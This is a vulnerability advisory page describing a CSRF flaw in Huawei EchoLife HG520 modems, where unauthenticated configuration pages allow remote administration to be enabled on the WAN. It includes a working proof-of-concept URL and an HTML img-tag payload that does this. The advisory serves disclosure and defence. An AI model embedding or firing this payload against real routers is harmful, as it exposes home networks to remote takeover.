Skip to main content
Websec Logo
Critical May 29, 2010

Huawei EchoLife HG520 Remote Management CSRF

Huawei EchoLife HG520 modems do not require authentication to access certain pages such as: '/Forms/access_cwmp_1', '/Forms/rpQos_1' and '/Forms/rpRManage_1'. A CSRF exploit can be used to enable remote administration inerfaces on the WAN.

CVSS Score

9.6 / 10.0

Severity

Critical

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Advisory

DeviceHuawei EchoLife HG520
Vulnerable ModelsHG520c, HG520b
Firmware3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0
SoftwareV100R001B021Telmex, V100R001B020Telmex
ImpactEnable remote admin over WAN
Websec AdvisoryWS10-12

Description

Huawei EchoLife HG520 modems do not require authentication for certain configuration pages, including /Forms/access_cwmp_1, /Forms/rpQos_1, and /Forms/rpRManage_1. A CSRF payload can be used to enable the remote administration interfaces on the WAN.

Exploit / Proof of Concept

Enable FTP, Telnet, and HTTP remote admin by requesting:

http://192.168.1.254/Forms/rpRManage_1?ACL_active=0

Client-side CSRF payload:

<img src="http://192.168.1.254/Forms/rpRManage_1?ACL_active=0">

Remediation

No vendor fix. Users should not browse untrusted sites while logged into the modem web UI; disable remote admin.

Share this advisory:

Related Security Advisories

Stay informed about other recent vulnerabilities and security advisories

Critical December 18, 2014

Command Execution and Backdoor in Zhone GPON-2520

This post will describe a backdoor account found in the Zhone GPON-2520 and will provide a PoC which can be used to disable the firewall filtration rules in order to allow access to services such as ssh, telnet and ftp.

Severity:
CVSS: 9.8
View advisory
High May 22, 2014

Huawei HG8245 / HG8247 WPA Generator

Huawei HG8245 & HG8247 ONT (firmware version V1R006C00S100) rely on a weak algorithm to calculate the WPA keys, keys can be predicted easily using the WiFi's MAC Address (BSSID).

Severity:
CVSS: 7.4
View advisory
High December 19, 2013

Arbitrary Command Execution in Alcatel-Lucent I-240W-Q

The Alcatel-Lucent I-240W-Q ONT's Diagnostics page does not filter shell metacharacters in the IP address field, allowing any authenticated administrator to execute arbitrary commands as root and fully compromise the device.

Severity:
CVSS: 8.0
View advisory
View All Advisories